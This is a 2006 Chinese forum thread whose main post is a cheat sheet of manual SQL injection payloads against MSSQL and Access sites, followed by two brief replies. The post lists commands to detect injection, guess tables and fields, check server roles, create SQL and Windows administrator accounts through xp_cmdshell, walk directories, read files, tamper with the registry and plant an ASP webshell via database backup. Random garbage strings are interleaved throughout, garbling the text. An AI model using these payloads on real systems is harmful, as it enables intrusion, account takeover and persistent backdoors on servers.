社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4938阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 BXy g ?  
  2.初步判断是否是mssql ;and user>0 eS9uKb5n(  
\&|)?'8rS  
  3.注入参数是字符'and [查询条件] and ''=' <rV3(qb#]J  
`Xvrf  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' Q.Tn"rE|  
I5PI;t+  
  5.判断数据库系统 FP=%e]vJ  
{(#Dou  
  ;and (select count(*) from sysobjects)>0 mssql -bT1Qh X  
LO0<=4iN(  
  ;and (select count(*) from msysobjects)>0 access >AI65g  
{ [ QCuR  
S*<+vIo  
VJ;4~WgBz  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 \?A 7{IY  
u*0Ck*pZ  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 +c!v%uX  
`''\FPhh  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Ge=+ 0W)&  
CL oc  
  9.(1)猜字段的ascii值(access) YNV4w{>FD  
;@ xSJqT  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 -@f5d  
/pni_-l*  
  (2)猜字段的ascii值(mssql) $ \0)~cy  
R@Ch3l@  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 n 5h4]u  
q_K8vGm4e  
  10.测试权限结构(mssql) wd&Tf R4!  
qELy'\  
$6Z@0H@X  
}_m/3*x_  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 0w[#`  
70IBE[T&  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- c+P.o.k;  
uBp"YX9rx  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- -)_"7}|u5  
i|A0G%m]$  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- R+Q..9 P  
2Ur9*#~kGp  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- $2N)m:X0  
*m$P17/C  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- $A"C1)d;  
ha_&U@w  
  ;and 1=(select IS_MEMBER('db_owner'));--  vU(2[  
X}Heaqn  
4 0as7.q  
@}sxA9 a  
  11.添加mssql和系统的帐户 T 2Uu/^  
[k qx%4q)  
  ;exec master.dbo.sp_addlogin username;-- \D Oqx  
  ;exec master.dbo.sp_password null,username,password;-- d'Cn] <  
>S\D+1PV  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- xx[XwN;  
~wtl\-cY  
  ;exec master.dbo.xp_cmdshell 'net user username password >drG,v0qh  
A#/O~-O^  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--  vV5dW  
A|3'9iL{9  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- 1yHlBeEC  
Yn!)('FdT!  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Lh eOGM  
aPD4S&"Q  
`<}Q4p  
IpX.ube  
  12.(1)遍历目录 X6hm,0[  
`1;m:,9  
  ;create table dirs(paths varchar(100), id int) jx*jYil  
=QG@{?JTl  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' prJ]u H,  
vRp#bScc  
  ;and (select top 1 paths from dirs)>0 |]s/NNU  
1< 22,  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) #m %ZW3  
:2+,?#W  
954!ED|F(  
LU'<EXUbY  
  (2)遍历目录 LBO3){=J  
Ph{7S43  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 2VB|a;Mo  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 V5ve  
HP/f`8  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 T'W)RYnwl  
"}"hQ.kAz  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ^r4@C2#vzJ  
VTM*=5|c   
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 c*fMWtPp  
)Q:.1Hgl  
FBDRbJ su  
Q}/2\Q=)j  
  13.mssql中的存储过程 >"Tivc5  
|_fmbG  
  xp_regenumvalues 注册表根键, 子键 V?_:-!NJ(  
mI$<+S1!  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 i -kj6N5  
}02#[vg  
  xp_regread 根键,子键,键值名 NoSq:e  
JI"&3H")g%  
  ;exec xp_regread */8b)I}yY  
A@:h\<  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 $_ &Lp\  
{nr}C4]o  
  xp_regwrite 根键,子键, 值名, 值类型, 值 H]zi>;D  
G0e]PMeFl  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 =I(F(AE  
n:TWZ.9  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 $ G\IzK  
Vn7FbaO^  
  xp_regdeletevalue 根键,子键,值名 H{tG:KH  
9n\b!*x  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 F'NX  
dq6|m }g{  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 /Soc,PjZ  
T6Oah:50EM  
^0x0 rY  
F\K&$5J{p  
  14.mssql的backup创建webshell 0`=>/Wr39  
PN(P$6  
  use model q3_ceXYU  
pbXh}YJ&  
  create table cmd(str image); ;$il_xA)\>  
L lNd97Z  
  insert into cmd(str) values (''); +VE ] .*T  
F"G]afI9+  
  backup database model to disk='c:\l.asp'; vV(?A  
YA?46[:  
^9jrI  
6=aXz2.f  
  15.mssql内置函数 ^KlW"2:  
d?9b6k?  
  ;and (select @@version)>0 获得Windows的版本号 OV.f+_LS  
BQOit.  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa @ ,9cpaL3  
6Fe$'TP  
  ;and (select user_name())>0 爆当前系统的连接用户 9 SBVp 6'  
;A\SbLM  
  ;and (select db_name())>0 得到当前连接的数据库 ^!FLi7X  
.%x1%TN  
Y|3n^%I  
'0jjoZ:  
  16.简洁的webshell  l,lfkm  
rBLcj;,  
  use model grs~<n|o\  
Y3n6y+Uzk  
  create table cmd(str image); V_Xq&!HN[  
G+S MH`h  
  insert into cmd(str) values (''); mne?r3d  
pWm==Ds|  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八